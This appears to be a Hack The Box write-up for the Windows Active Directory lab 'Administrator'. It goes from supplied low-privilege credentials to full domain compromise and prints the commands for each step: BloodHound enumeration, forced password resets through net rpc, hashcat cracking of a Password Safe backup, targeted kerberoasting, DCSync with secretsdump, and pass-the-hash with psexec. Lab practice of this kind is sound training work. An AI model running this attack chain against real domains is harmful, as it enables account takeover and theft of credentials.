Machine Information: Administrator is a medium-difficulty Windows machine designed around a complete domain compromise scenario, where credentials for a low-privileged user are provided.
IP : 10.10.11.42
Difficulty: Medium
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:
Username: Olivia
Password: ichliebedich
Nmap
nmap -T4 -p- -A -v 10.10.11.42 nmap/nmap_
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-15 11:39:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49159/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
59359/tcp open msrpc Microsoft Windows RPC
65504/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
65515/tcp open msrpc Microsoft Windows RPC
65520/tcp open msrpc Microsoft Windows RPC
65523/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-15T11:40:12
|_ start_date: N/A
|_clock-skew: 6h59m58s
Looking at the nmap scan, it is an Active Directory machine since the port 88 is open for kerberos along with LDAP. Other interesting open ports include ftp, smb and winrm. Since we already have the credentials, the first thing I like to check is if we can access the ftp, smb or winrm with the provided credentials.
SMB
smbmap -H 10.10.11.42 -u 'olivia' -p 'ichliebedich'
SMBMap shows that this user does not have access to any share apart from the default ones. In addition to it, credentials seems to be valid as it allows read access to default shares. This can also be confirmed by also running netexec.
FTP
Let’s check if we can access the FTP with the provided credentials.
ftp 10.10.11.42
WinRM
cme winrm 10.10.11.42 -u 'olivia' -p 'ichliebedich'
Logging in With Evil-Winrm
evil-winrm -i 10.10.11.42 -u olivia -p "ichliebedich"
Since we are logged into the machine, we can run some commands to enumerate the domain including the privileges this user has along with the users on the machine. We got a list of possible users by running the net user command.
As we already got valid credentials, lets enumerate the domain by running LDAPDomainDump and BloodHound. Usually, BloodHound itself is sufficient but I like to use ldapdomaindump to see the groups structure and which user is part of each group in a table structure.
LDAPDomainDump
ldapdomaindump ldap://10.10.11.42 -u 'administrator.htb\olivia' -p 'ichliebedich'
To look at the dump, access the ‘Domain Users By Group’ to look at the members in the domain along with the group they are member of. This gives an overview of the domain and the possible next attack path that we can attempt. Moreover, it shows what members are high value targets that we should focus using BloodHound. Share Moderators is one of the non-standard group and it has Benjamin as the user.
Its always a good practice to look at all the files from ldapdomaindump to see what information they provide. For this machine, looking at the domain users by group is enough.
BloodHound
Now as we have an idea of the domain, lets run bloodhound to see if we can utilize our currest Olivia user to move forward within the domain. I ran SharpHound by uploading the file through the winrm session. Alternatively, as we already got valid credentials bloodhound-python can also be used to get the same data.
Running SharpHound
upload sp.exe
./sp.exe -c all
download bloodhound_filename.zip
Upload the data to the bloodhound and lets enumerate from the user Olivia.
Olivia user has generic write to Michael user, which in turns has force change password for benjamin user. Benjamin user is part of share moderators group which we can probably use to access the ftp server.
Abusing Rights
Olivia has generic write that allows to the change the password for user Michael.
net rpc password "Michael" "P@ssword123" -U administrator.htb/"Olivia"%"ichliebedich" -S 10.10.11.42
Michael can change the password for user Benjamin, who if we recall, is part of the ‘Share moderators’ group.
net rpc password "Benjamin" "P@ssword123" -U administrator.htb/"Michael"%"P@ssword123" -S 10.10.11.42
Everytime, we get access to the new user, it is always a good practice to enumerate the services that we can using the new user, including the ftp and smb in this instance. As we can see, Benjamin user can login to the ftp service.
Logging into FTP as Benjamin
Logging into the FTP as user Benjamin shows the backup database file. Before downloading on FTP, it is always better to change mode from ascii to binary.
ftp 10.10.11.42
We can use the file utility to learn more about the type of file. It shows that the file is Password Safe v3 database file.
Cracking Psafe DB
Password Safe is a password manager that might have credentials stored in it. To open the database file, we need to crack its master password. Hashcat has a module for cracking the Password Safe database files.
hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt -O
Opening Password Safe
To open the Password safe, you can download the password safe utility.
sudo apt install passwordsafe
##To open the pwsafe
pwsafe
Enter the master password cracked using hashcat to open the password safe.
Being good enumerators, we know that Alexander user is disabled. You can confirm it by looking at the ldapdomaindump. Emily and Emma are our next targets to focus on. Since we got their credentials, first we should confirm if the credentials are still valid as it was a backup password safe and users might have changed their password since then. If the credentials are valid, we should next check how we can move forward by looking at these users from BloodHound.
Emily user has generic write over user Ethan that has DC sync rights. Generic write allows to run a targeted kerberoast attack and return a hash that we can attempt to crack. For running targeted kerberoast, you might need to update your system clock using ntupdate.
./kerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQ[Redacted]'
Using the hashcat module 13100, we can crack the ethan password using the rockyou.txt list.
hashcat -m 13100 ethan.txt /usr/share/wordlists/rockyou.txt -O
SecretsDump Domain
As the Ethan user has DC sync rights, we can use the cracked password to dump all the secrets from the domain including the administrator NTLM hash.
secretsdump.py administrator.htb/ethan:'limp[Redacted]'@10.10.11.42
Now, you can just use the Administrator hash to login to the machine. In this case, I used psexec.
psexec.py administrator@10.10.11.42 -hashes ':3dc[Redacted]'
You can go to the administrator’s desktop to grab the root flag. If you find this blog useful, please consider giving respect on Hack The Box.